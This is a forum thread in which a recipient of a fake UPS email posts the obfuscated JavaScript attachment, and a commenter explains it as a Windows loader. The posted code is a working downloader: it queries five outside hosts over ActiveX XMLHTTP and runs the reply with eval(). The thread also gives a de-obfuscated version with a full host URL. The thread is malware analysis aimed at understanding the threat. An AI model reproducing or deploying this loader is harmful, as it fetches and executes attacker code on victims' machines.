Received this Code as an Attachment in an Email and Was Wondering What it Does

I received an email at my work email address that had an attachment. The body looked exactly like this (without the quotes):

“Dear Customer,
We can not deliver your parcel arrived at July 06.
Please check the attachment for details!
Thanks and best regards,
,
UPS Senior Office Manager.”

Now, it’s obviously not a legitimate email from UPS but I was curious what was in the attachment. It was a zip file containing a JavaScript file that was named “UPS-Package-2417924.doc” (the .doc was part of the filename, not the extension). I assume the “.doc” portion was to try to trick me into thinking it was a Word file so that I would open it.

I’m obviously not going to run this file but I don’t really know much about JavaScript, so I was just curious what this file would’ve done. Here is the code that was in the file:

[CODE]// strips the "AA" filler inserted into strings, e.g. "htAAtAAp" -> "http"
function nomusta(prototu){return prototu.replace(/AA/g,"");}
// query string sent to every host
var zemk = '0000001FELhCxJErs1gdVzVBfoPJyaY9fasQovu502397400MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA8Ffp5P7h-_sedxegmVG2HmyNEfZORvOa_FkQShvtOcXD9X9lBgG_Nivk7FWsAVxubHDD5tiwaMl7focgZZ9pSiKN7mA9RFlVmMKjAOCEk0ST5YWBByM0lNCD2sOPMfwDJrhjq9v99mB7Ur0rU6wyI1pClZQWNPfVdQYusKQ6UXp4bWql2HAKH34d2sPrn1cRKrUT3bF0wlo45EKouEzU7bNghbUahhwxRtLKDNLFqVDhOtz-A-CPpq3A34xZHZGkdKVImClOCUk3waXVDZMy4-xME6rQHqgaqMjU2xHin4YMC3xdaFiftzog61JIkg2xuB0mJXfZRHVAd2xUdqQgIQIDAQABLZQA8ZMqYFppY6hfDTF-fbo-4YntQ1d6ffAJaPSXGzXegX2bJyVvSmnEpSpWezH8__PnNoU8WeZndhNl0';
// marker the response is split on before being executed
var ruxk = '208f9056fa4a82dd53ca03b3e2468c8f';
var kiron = 0; // index into the host list
var x = ["expert5.ru","serdcezemli.ru","blog.3yinaudio.com","infosoft.pl","bennuakar.com"];
var jacob = new Array('RESPAN', 'GET', 'MUSIDO', ''); // jacob[3-2] is "GET"
var mustafa = x.length+0;
function zulum(pikue) {pikue.send();}
function malysh() {return nomusta("htAAtAAp");}   // "http"
function rizma(kjg, lki) { return kjg.split(lki);}
function greezno() {return nomusta('counAAter');} // "counter"
function hust(gulibator){eval(gulibator);}        // runs whatever the server returned
function kidok(heruim){return heruim.responseText;}
while(true)
{
if(kiron>=mustafa)
{
break;
}
try
{
var fuka = new ActiveXObject(nomusta("MSXAAML2.XMLHTAATP")); // "MSXML2.XMLHTTP"
var ghyt = !true; // false: synchronous request
var gerlk = x[kiron];
fuka.open(jacob[3-2], ""+malysh()+"://"+gerlk+'/'+greezno()+'?'+zemk, ghyt);
zulum(fuka);
var gt = kidok(fuka);
var kimmich = gt.length;
var miffka = gt.indexOf(ruxk);
var miluoki = "a"+"";
// only accept a reply longer than 1000 characters that contains the marker
if ((kimmich+0) > (8+1+1) * 100 && 2 == 2 && miffka + 3 > 2)
{
var gusar = rizma(gt, ruxk).join(miluoki); // replace every marker with "a"
hust(gusar);
break;
}
}
catch(e)
{
};
kiron++; // on failure, try the next host
};[/CODE]

Can anyone tell me what this file was designed to do? Like I said, I’m not going to run it. I’m just curious what this person was trying to do. Any help is much appreciated. Thanks!

JavaScript

4 Comment(s)

@rootAug 25.2017 — Had another quickie at this, it's a reasonable attempt at obfuscation on some elements, some methods employed like [B]"htAAtAAp"[/B] when passed to the function to extract the string, results in [B]http[/B] and I am guessing that this is enough to fool Windows Firewall or the firewall you use into thinking that the scripting is safe.

In any case, the typical AJAX routine creates an ajax object that requests data and that data string is then chopped up with this [B]208f9056fa4a82dd53ca03b3e2468c8f[/B] value set in the variable [B]ruxk[/B] then the array is joined by the value set in [B]miluoki[/B] which is [B]a[/B], then this is passed through the [B]eval[/B] function, so this means that the data is likely to be another JavaScript as the payload with this script being the loader.

So now you know that it is loading scripts, the question of what is it doing is another question altogether. It depends on which URL it is pulling its data from, when you look at how the URL is determined, then you have a starting point, when you look at this part of the code
[CODE]var fuka = new ActiveXObject(nomusta("MSXAAML2.XMLHTAATP"));
var ghyt = !true;
var gerlk = x[kiron];
fuka.open(jacob[3-2], ""+malysh()+"://"+gerlk+'/'+greezno()+'?'+zemk, ghyt);
zulum(fuka);
var gt = kidok(fuka);[/CODE]
you can then see how the AJAX routine is working and that by how the routine is made up, it is looking like it's targeted only at Windows users by the way it uses ActiveX to make the AJAX object.

so
[CODE]var fuka = new ActiveXObject("MSXML2.XMLHTTP");
var ghyt = !true;
var gerlk = x[kiron]; // gerlk = x[kiron] and kiron is 0, so gerlk = "expert5.ru"
fuka.open("GET", "http://expert5.ru/counter?0000001FELhCxJErs1gdVzVBfoPJyaY9fasQovu502397400MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA8Ffp5P7h-_sedxegmVG2HmyNEfZORvOa_FkQShvtOcXD9X9lBgG_Nivk7FWsAVxubHDD5tiwaMl7focgZZ9pSiKN7mA9RFlVmMKjAOCEk0ST5YWBByM0lNCD2sOPMfwDJrhjq9v99mB7Ur0rU6wyI1pClZQWNPfVdQYusKQ6UXp4bWql2HAKH34d2sPrn1cRKrUT3bF0wlo45EKouEzU7bNghbUahhwxRtLKDNLFqVDhOtz-A-CPpq3A34xZHZGkdKVImClOCUk3waXVDZMy4-xME6rQHqgaqMjU2xHin4YMC3xdaFiftzog61JIkg2xuB0mJXfZRHVAd2xUdqQgIQIDAQABLZQA8ZMqYFppY6hfDTF-fbo-4YntQ1d6ffAJaPSXGzXegX2bJyVvSmnEpSpWezH8__PnNoU8WeZndhNl0", false);
fuka.send();
var gt = fuka.responseText;[/CODE]


false is used to make the routine wait for a reply, so no need for the onreadystatechange for async type loading, it makes sure that the script is loaded so that the script can then use the response without those state change checks. That's why the responseText return is after the send() request.

The routine is nested in a [B]try .. catch[/B] container to stop the script from breaking if an error is encountered during the loader attempts to load from the various URLs the various payloads. This is contained in a [B]while(true)[/B] loop which increments the kiron counter to then attempt to load another payload.

So I had a little dig to try and coax the server to honour my request and got an empty page, so I am figuring that the server has some preventative measures from casual poking around. So I grabbed some header information
[quote]HTTP/1.1 200 OK =>
Date => Fri, 25 Aug 2017 11:48:15 GMT
Server => Apache/2.2.15 (Red Hat) mod_rpaf/0.6 PHP/5.4.30
X-Powered-By => PHP/5.4.30
Content-Length => 0
Connection => close
Content-Type => text/html; charset=UTF-8[/quote]
and as you can see,
@rootAug 25.2017 — , there is a live server but it's not playing ball...
@TheAdamBomb7authorAug 25.2017 — Wow, thank you for the quick and detailed response. I appreciate it.

So, I'm not 100% sure I understand what's happening though. Is the ajax object requesting data from me and then sending it to the server, like a keylogger or something? Or is it just communicating with the server, sending data back and forth, and trying to perform some unknown function (unknown due to the server being inaccessible I assume)?
@rootAug 25.2017 — It is getting a response from the server, that's what the script is doing, getting scripts from several servers and running them by using eval()